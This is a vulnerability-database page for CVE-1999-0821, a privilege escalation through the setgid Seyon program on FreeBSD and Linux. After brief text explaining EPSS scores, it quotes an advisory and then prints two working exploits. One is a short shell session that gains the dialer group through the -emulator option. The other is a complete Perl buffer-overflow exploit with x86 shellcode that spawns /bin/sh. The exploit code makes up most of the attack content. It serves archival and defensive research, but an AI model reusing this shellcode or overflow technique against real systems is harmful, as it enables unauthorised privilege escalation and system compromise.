CVE-1999-0821 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

source: https://www.securityfocus.com/bid/838/info FreeBSD 3.3-RELEASE ships with Seyon, a communications program which is known to have several vulnerabilities which can allow for a malicious user to elevate priviliges. The vulnerability, however, is that seyon is still installed setgid dialer in FreeBSD. When seyon is exploited, a local user can grant him/herself priviliges which allow access to the communications devices or anything else accessable by the group dialer. One of the methods to exploit seyon is shown below: bash-2.03$ echo 'void main() { system("/usr/bin/id"); }' > id.c bash-2.03$ gcc -o id id.c bash-2.03$ seyon -emulator ./id uid=1000(xnec) gid=1000(xnec) egid=68(dialer) groups=68(dialer), 1000(xnec)

#!/usr/bin/perl ## (c) Copyright [email protected] / anno domani 2000 ## ## Seyon Exploit / Tested Version 2.1 rev. 4b i586-Linux ## Tested on: RedHat 4.0/5.1 ## ## Greets: scrippie, *@HWA, grazer, mixter, pr0ix, s\ ## http://www.digit-labs.org/ || http://teleh0r.cjb.net/ $shellcode = "\xeb\x1f". #/* jmp 0x1f */ "\x5e". #/* popl %esi */ "\x89\x76\x08". #/* movl %esi,0x8(%esi) */ "\x31\xc0". #/* xorl %eax,%eax */ "\x88\x46\x07". #/* movb %eax,0x7(%esi) */ "\x89\x46\x0c". #/* movl %eax,0xc(%esi) */ "\xb0\x0b". #/* movb $0xb,%al */ "\x89\xf3". #/* movl %esi,%ebx */ "\x8d\x4e\x08". #/* leal 0x8(%esi),%ecx */ "\x8d\x56\x0c". #/* leal 0xc(%esi),%edx */ "\xcd\x80". #/* int $0x80 */ "\x31\xdb". #/* xorl %ebx,%ebx */ "\x89\xd8". #/* movl %ebx,%eax */ "\x40". #/* inc %eax */ "\xcd\x80". #/* int $0x80 */ "\xe8\xdc\xff\xff\xff". #/* call -0x24 */ "/bin/sh"; #/* .string \"/bin/sh\" */ $ret = 0xbfffef96; $egg = 500; $len = 208; $nop = 'A'; if (@ARGV == 1) { $offset = $ARGV[0]; } if (!($ENV{'DISPLAY'})) { die("Error: the shell variable DISPLAY is not set.\n"); } $buffer .= $nop; $new_ret = pack('l',($ret + $offset)); print("Address: 0x", sprintf('%lx',($ret + $offset)), "\n"); sleep(1); for ($i = 0; $i < $len; $i += 4) { $buffer .= pack('l',($ret + $offset)); } for ($i = 0; $i < ($egg - length($shellcode)); $i++) { $buffer .= $nop; } $buffer .= $shellcode; # seyon uses X, so if there is no X server running, or you # are not allowed to connect to it, start X on your machine, # and using xhost, allow the target to connect to your server, # then: export DISPLAY=your-ip:0.0 - and execute the exploit. exec("/usr/X11R6/bin/seyon -noemulator \"$buffer\""); # milw0rm.com [2001-01-15]